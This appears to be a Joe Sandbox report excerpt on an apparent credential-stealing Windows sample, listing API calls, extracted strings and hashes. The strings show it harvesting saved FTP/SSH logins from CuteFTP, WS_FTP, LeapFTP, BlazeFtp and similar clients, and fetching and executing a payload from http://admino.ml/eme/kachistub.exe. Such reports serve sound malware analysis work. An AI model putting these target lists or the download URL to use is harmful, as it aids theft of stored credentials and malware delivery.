                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00402289
                                                • GetHGlobalFromStream.OLE32(?,?,?,?), ref: 004022B5
                                                • GlobalLock.KERNEL32(?), ref: 004022E5
                                                • GlobalUnlock.KERNEL32(?), ref: 00402304
                                                • GetHGlobalFromStream.OLE32(?,?,?,?,?,?), ref: 00402316
                                                • GlobalLock.KERNEL32(?), ref: 00402346
                                                • GlobalUnlock.KERNEL32(?), ref: 00402365
                                                  • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Global$FromLocalLockStreamUnlocklstrlen$AllocCloseEnumFreeOpen
                                                • String ID: 8Ap$DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString$XDp
                                                • API String ID: 4234118056-1123427017
                                                • Opcode ID: 1bdbc9636d64f6988254104348b2b22802a161d16057e81c9594173105e17b62
                                                • Instruction ID: e8800f7e17a62db29e95db71b44d800467aa85f06a3210c5d1cd602f7ee17b8c
                                                • Opcode Fuzzy Hash: 1bdbc9636d64f6988254104348b2b22802a161d16057e81c9594173105e17b62
                                                • Instruction Fuzzy Hash: 54614A35900168BADF31AB61CD46FE97679EB44308F1040FAB588B11E1D7F89ED4AE68

                                                Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)

                                                APIs
                                                  • Part of subcall function 00401788: GetHGlobalFromStream.OLE32(?,?), ref: 00401795
                                                  • Part of subcall function 00401788: GlobalLock.KERNEL32(?), ref: 004017AC
                                                  • Part of subcall function 00401788: GlobalUnlock.KERNEL32(?), ref: 004017C4
                                                • wsprintfA.USER32 ref: 0040FEEA
                                                • GetTempPathA.KERNEL32(00000104,?,00000000,00000000,00000002), ref: 0040FF5D
                                                • GetTickCount.KERNEL32 ref: 0040FF75
                                                • wsprintfA.USER32 ref: 0040FF87
                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 0040FF98
                                                • lstrlen.KERNEL32(true,?,00000000), ref: 00410000
                                                • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00410029
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                                                  • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                                                  • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Globallstrlen$wsprintf$CountCreateDirectoryExecuteFromLockPathShellStreamTempTickUnlocklstrcatlstrcpy
                                                • String ID: %02X$%d.exe$MZ$http://admino.ml/eme/kachistub.exe$open$true
                                                • API String ID: 3844566713-2745409385
                                                • Opcode ID: 0d76fbcb0b14d752bb8ae91c82b55ed4428da859b986344cc61ad5509a06a30c
                                                • Instruction ID: 798d6633d1dddfa29f699b8c5659430589b66450ff5dd2e29decf7e633b954bc
                                                • Opcode Fuzzy Hash: 0d76fbcb0b14d752bb8ae91c82b55ed4428da859b986344cc61ad5509a06a30c
                                                • Instruction Fuzzy Hash: 93417B71900228AADB30AB61DC46FEEBBB99B05305F1005FBB548B11E1D6F84FC49F58

                                                Control-flow Graph (function 00402C01; graph image not reproduced)
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: S-1-5-18
                                                • API String ID: 0-4289277601
                                                • Opcode ID: db4d93788858fa455111b74aaf46cfe2d110fbcd533ae32d5aeae6627cc242d6
                                                • Instruction ID: d6a68a7a6fba872fbc8a204bfee8a5bac27731b7f04a2bc92072417478d2585c
                                                • Opcode Fuzzy Hash: db4d93788858fa455111b74aaf46cfe2d110fbcd533ae32d5aeae6627cc242d6
                                                • Instruction Fuzzy Hash: 69216230908209BFEF119BA0DD4ABEE7B79FB40305F104576A500B51E1D7F99A90DB1C

                                                Control-flow Graph (function 0040668F; graph image not reproduced)
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?), ref: 004066A5
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004066D9
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040690C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: Host$InitialPath$Login$Password$PasswordType$Port
                                                • API String ID: 1332880857-4069465341
                                                • Opcode ID: 28cd642b9a14632e63f69432792bab59c27dff5175793cf9a6a00b0a1e583e89
                                                • Instruction ID: ddbf5386c557692e0a2d872b86364cc9d1953b440620d6587ff0ea321d438c9c
                                                • Opcode Fuzzy Hash: 28cd642b9a14632e63f69432792bab59c27dff5175793cf9a6a00b0a1e583e89
                                                • Instruction Fuzzy Hash: 9551E43194011CEADF217B51CC02BED7AB9BF44308F10C5BAA549750B1DB7A5BA5DF88

                                                Control-flow Graph (function 0040D072; graph image not reproduced)
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040D085
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D0B9
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D2C2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: InitialDirectory$Password$PortNumber$ServerName$ServerType$UserID
                                                • API String ID: 1332880857-2649023343
                                                • Opcode ID: 26b4e598b9372ea9a7266eecca5fc6ce7ec23d02ee09a61f1aff9897374d5be7
                                                • Instruction ID: 6c2faa976b9052ac72c52ca6464a050bd4b3273960fb2c20a586784dcbee0562
                                                • Opcode Fuzzy Hash: 26b4e598b9372ea9a7266eecca5fc6ce7ec23d02ee09a61f1aff9897374d5be7
                                                • Instruction Fuzzy Hash: 6251C831840218BADF216FA1CC02FDD7AB9BF04704F14C1BAB548750B1DB7A9B95AF98

                                                Control-flow Graph (function 00407BBA; graph image not reproduced)
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407BCD
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407C01
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407E17
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: FSProtocol$HostName$Password$PortNumber$RemoteDirectory$UserName
                                                • API String ID: 1332880857-3874328862
                                                • Opcode ID: 2c8a0ba067aeae211804c2b3bc1768c6308746ccaa7f1f6ecbc86453ddc7cdbe
                                                • Instruction ID: 1780444ab987c72a7c0881d1e1f70479cbe17c78eae0564416758d360709c296
                                                • Opcode Fuzzy Hash: 2c8a0ba067aeae211804c2b3bc1768c6308746ccaa7f1f6ecbc86453ddc7cdbe
                                                • Instruction Fuzzy Hash: 7051E131900118FADF226F61CC42BED7AB9BF04344F10C5BAB548750B1DB7A6A91AF99

                                                Control-flow Graph

                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040DC75
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DCA9
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DE92
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: FTP destination catalog$FTP destination password$FTP destination port$FTP destination server$FTP destination user$FTP profiles
                                                • API String ID: 1332880857-3620412361
                                                • Opcode ID: e6211431e13e1cf627f221f8aaeb6b63aab97b3a1b50d2f0ce6b7fc3b5632f45
                                                • Instruction ID: 9e186bede9d82e05e6d3405ca47770cfa7b4b9f889abd471e1f7745202da50bf
                                                • Opcode Fuzzy Hash: e6211431e13e1cf627f221f8aaeb6b63aab97b3a1b50d2f0ce6b7fc3b5632f45
                                                • Instruction Fuzzy Hash: 32519671850118AADF226F61CC42FDD7ABAFF04304F1085B6B548750B1DF7A9AA5AFC8

                                                Control-flow Graph

                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407F1F
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407F53
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040811B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: PassWord$Port$RootDirectory$ServerType$Url$UserName
                                                • API String ID: 1332880857-2128033141
                                                • Opcode ID: 95adbcca4e30ed0107d4c85792cdc31850d83065dac8f4d6df457c6753f9edcc
                                                • Instruction ID: 5ab7ce4d41d7449111e2bf0245fe8bdc2d5e3158fb84ab1408711ceaad0d48f8
                                                • Opcode Fuzzy Hash: 95adbcca4e30ed0107d4c85792cdc31850d83065dac8f4d6df457c6753f9edcc
                                                • Instruction Fuzzy Hash: C4519431840118BADF226F51CD42FED7AB9BF04344F14C5BAB558740B1DB7A5B91AF88

                                                Control-flow Graph (function 004026DD; graph image not reproduced)
                                                APIs
                                                • RegCreateKeyA.ADVAPI32(Software\WinRAR,?), ref: 004026F8
                                                • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?,?), ref: 00402711
                                                • RegCloseKey.ADVAPI32(?,?,?,00000000,00000003,?,?), ref: 0040271E
                                                • GetTempPathA.KERNEL32(00000104,?), ref: 00402737
                                                • CreateDirectoryA.KERNEL32(?,00000000,00000104,?), ref: 00402758
                                                • ExitProcess.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 004027B3
                                                • CloseHandle.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 004027D1
                                                • DeleteFileA.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 004027E0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseCreate$DeleteDirectoryExitFileHandlePathProcessTempValue
                                                • String ID: Software\WinRAR
                                                • API String ID: 2428708885-224198155
                                                • Opcode ID: 986673cc228dc13c8f70e56d3af3248f7e43fa717c1056dcfd0bbbd5ca96e852
                                                • Instruction ID: 28b2972cc479343a501f6bdb5bbfbd3fa5c74dd95b9eafedc45f56a84fd52fee
                                                • Opcode Fuzzy Hash: 986673cc228dc13c8f70e56d3af3248f7e43fa717c1056dcfd0bbbd5ca96e852
                                                • Instruction Fuzzy Hash: 7621743194020DBBDF216FA0CD86FDD7A69AB14748F100076B214B61E1E6F99AD06B18
                                                APIs
                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040506F
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                                                  • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                                                  • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                                • GetPrivateProfileStringA.KERNEL32(WS_FTP,DIR,00414847,?,00000104,?), ref: 004050BF
                                                • GetPrivateProfileStringA.KERNEL32(WS_FTP,DEFDIR,00414847,?,00000104,?), ref: 004050FA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: PrivateProfileStringlstrlen$DirectoryWindowslstrcatlstrcpy
                                                • String ID: DEFDIR$DIR$WS_FTP$\Ipswitch$\Ipswitch\WS_FTP$\win.ini
                                                • API String ID: 2508676433-45949541
                                                • Opcode ID: 936baacf3040b1f673e2b536d3b0c0ba39795cdad37abdd808d2d64cf94abb45
                                                • Instruction ID: 1ad5851406937463fc4fdd25d104d768d2af762f2f9e7c483ba0ad0795fe615e
                                                • Opcode Fuzzy Hash: 936baacf3040b1f673e2b536d3b0c0ba39795cdad37abdd808d2d64cf94abb45
                                                • Instruction Fuzzy Hash: A8212671E80608BADB127A61CC43FDE3A299B54744F100077B758B51E3DBF99BD09A6C
                                                APIs
                                                  • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040EA1C
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000105), ref: 0040EA50
                                                • GetPrivateProfileStringA.KERNEL32(Program,DataPath,00414847,?,00000104,00000000), ref: 0040EAD6
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000105), ref: 0040EB2F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocCloseEnumLocalOpenPrivateProfileString
                                                • String ID: DataPath$Path$Program$\PocoSystem.ini$accounts.ini
                                                • API String ID: 1343824468-2495907966
                                                • Opcode ID: 83f224f1632b9f4dce77d821230e8882deb379fc18da0ded7f5086493192e42a
                                                • Instruction ID: ac58ce0af485c97c10e38b57228944f3f3edc0c01af0d6674f8eb1bd57798e51
                                                • Opcode Fuzzy Hash: 83f224f1632b9f4dce77d821230e8882deb379fc18da0ded7f5086493192e42a
                                                • Instruction Fuzzy Hash: F1314A31940118BADF11BB91CC42FDD7ABAFF04704F10C4BAB554710E1DAB99AA1AF98
                                                APIs
                                                • StrStrIA.SHLWAPI(00704138,BlazeFtp), ref: 0040C84A
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: 8Ap$BlazeFtp$LastAddress$LastPassword$LastPort$LastUser$Software\FlashPeak\BlazeFtp\Settings$\BlazeFtp$site.dat
                                                • API String ID: 1884169789-3555203199
                                                APIs
                                                • StrStrA.SHLWAPI(00704138,unleap.exe), ref: 00407AB1
                                                • lstrlen.KERNEL32(unleap.exe,00000001,00704138,unleap.exe), ref: 00407ACA
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                • StrStrIA.SHLWAPI(00704458,leapftp,00704138,unleap.exe), ref: 00407B0E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: 8Ap$SOFTWARE\LeapWare$XDp$leapftp$sites.dat$sites.ini$unleap.exe
                                                • API String ID: 1884169789-2350762770
                                                APIs
                                                • StrStrIA.SHLWAPI(00704138,CUTEFTP), ref: 004053EA
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                • CUTEFTP, xrefs: 004053E4
                                                • Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar, xrefs: 00405461
                                                • Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar, xrefs: 0040546E
                                                • Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar, xrefs: 00405454
                                                • \sm.dat, xrefs: 004053FE
                                                • Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar, xrefs: 00405488
                                                • Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar, xrefs: 00405447
                                                • Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar, xrefs: 0040547B
                                                • 8Ap, xrefs: 004053D9
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: 8Ap$CUTEFTP$Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar$\sm.dat
                                                • API String ID: 1884169789-1015284258
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?), ref: 00406413
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406447
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406655
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: Host$Port$PthR$SSH$User
                                                • API String ID: 1332880857-1643752846
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?), ref: 00405F62
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405F96
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406142
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumFreeLocalOpen
                                                • String ID: HostAdrs$Password$Port$RemoteDir$UserName
                                                • API String ID: 3369285772-3748300950
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040718F
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004071C3
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407355
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: Directory$Password$Server$UserName$_Password
                                                • API String ID: 1332880857-3317168126
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040DA0D
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DA41
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DBD5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
